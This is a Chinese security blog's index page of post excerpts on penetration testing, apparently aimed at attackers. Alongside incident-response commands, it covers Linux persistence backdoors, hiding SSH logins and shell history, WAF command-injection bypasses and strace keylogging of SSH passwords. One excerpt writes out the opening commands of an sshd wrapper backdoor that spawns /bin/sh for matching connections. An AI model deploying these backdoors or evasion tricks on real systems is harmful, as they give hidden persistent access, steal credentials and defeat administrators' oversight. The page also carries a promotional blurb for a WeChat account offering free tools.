2021年3月12日
linux应急常用命令+技巧总结
摘要: 常用命令 top # 命令可以直接看到进程实时情况。 ps aux --sort=pcpu | head -10 # 查看cpu占用率前十的进程,有时候可以发现top发现不了的东西 netstat -anpl # 检查当前存在的连接与监听端口 ps -ef #查看当前系统上运行的所有进程与其使用的命 阅读全文
posted @ 2021-03-12 11:50 drunk-kk 阅读(120) 评论(0) 推荐(0)
2021年3月10日
linux-wrapper跟inetd服务后门
摘要: wrapper后门实践 先部署后门 cd /usr/sbin/ mv sshd ../bin/ echo '#!/usr/bin/perl' >sshd echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd echo 'exe 阅读全文
posted @ 2021-03-10 18:46 drunk-kk 阅读(206) 评论(0) 推荐(0)
2021年3月9日
[GET!] 6个Linux痕迹隐藏小技巧!
摘要: 目录 隐藏远程SSH登陆记录 清除当前的history记录 隐藏Vim的操作记录 隐藏文件修改时间 锁定文件 清除系统日志痕迹 隐藏远程SSH登陆记录 隐身登录系统,不会被w、last等指令检测到。 ssh -T root@192.0.0.1 /bin/bash -i -T表示不分配伪终端,/usr 阅读全文
posted @ 2021-03-09 10:28 drunk-kk 阅读(435) 评论(0) 推荐(0)
2021年3月8日
linux隐藏你的crontab后门
摘要: crontab定时后门 ​ crontab是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。 ​ 注意: 新创建的 cron 任务,不会马上执行,至少要过 2 分钟后才可以,当然你可以重启 cron 来马上执行 ​ 比如我们通过red 阅读全文
posted @ 2021-03-08 10:47 drunk-kk 阅读(729) 评论(0) 推荐(0)
2021年2月27日
渗透测试在线工具集合
摘要: 社工搜索 手机号注册过哪些网站 搜索用户名 搜索邮箱 验证邮箱是否存在 查看泄漏记录 ip定位工具 临时手机号 临时邮箱 检测一个网站是不是蜜罐 天眼查 ip查询 指纹识别 云悉指纹 ThreatScan BugScaner TScan 子域名查询 C段查询 dnsdb searchdns 在线子域 阅读全文
posted @ 2021-02-27 14:22 drunk-kk 阅读(137) 评论(0) 推荐(0)
2021年2月21日
渗透测试中waf命令执行的绕过经验技巧
摘要: 管道符 ; 顺序执行,命令之间没有逻辑关系 正常顺序执行 && 逻辑与; 当命令1正确执行后,才会执行命令2。否则命令2不会执行 两个命令都会执行 || 逻辑或; 当命令1不正确执行后,命令2才会执行。否则命令2不会执行 mi 会执行whom 其他特殊符号 | 符号 | 作用 | | | | | ' 阅读全文
posted @ 2021-02-21 14:49 drunk-kk 阅读(180) 评论(0) 推荐(0)
linux后门之strace后门键盘记录
摘要: 介绍 strace是一个动态跟踪工具,它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围 使用场景 通过其他方式拿到shell,通过history、流量抓包、或者本地没有翻到密码的情况。我们想要获取当前主机的密码,或者通过这台主机连接到其他主机的密码。 记录ssh 阅读全文
posted @ 2021-02-21 14:47 drunk-kk 阅读(627) 评论(0) 推荐(0)
渗透测试工具BurpSuite教程中的奇滛小技巧
摘要: 如果每个人都理解你,你得普通成什么样 前言 分享一些使用burp中自己常用的技巧,觉得实用的话记得分享一下哦~ 1.快速生成CSRF测试代码 测试csrf漏洞时候,快速生成scrf的html的代码。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z5Y6Pq6q-16 阅读全文
posted @ 2021-02-21 14:45 drunk-kk 阅读(146) 评论(0) 推荐(0)
[渗透工具] - 一款IP资产巡航扫描系统
摘要: 项目地址 : https://github.com/awake1t/linglong linglong 一款资产巡航扫描系统。系统定位是通过masscan+nmap无限循环去发现新增资产,自动进行端口弱口令爆破/、指纹识别、XrayPoc扫描。主要功能包括: 资产探测、端口爆破、Poc扫描、指纹识别 阅读全文
posted @ 2021-02-21 14:40 drunk-kk 阅读(564) 评论(0) 推荐(0)
公众号: 【**渗透测试教程**】 专注渗透测试、渗透自动化武器研发。回复666,免费领取渗透学习资料+工具!希望能够给你带来收获! ![](https://img2020.cnblogs.com/blog/2100350/202102/2100350-20210221144435440-1497834335.jpg)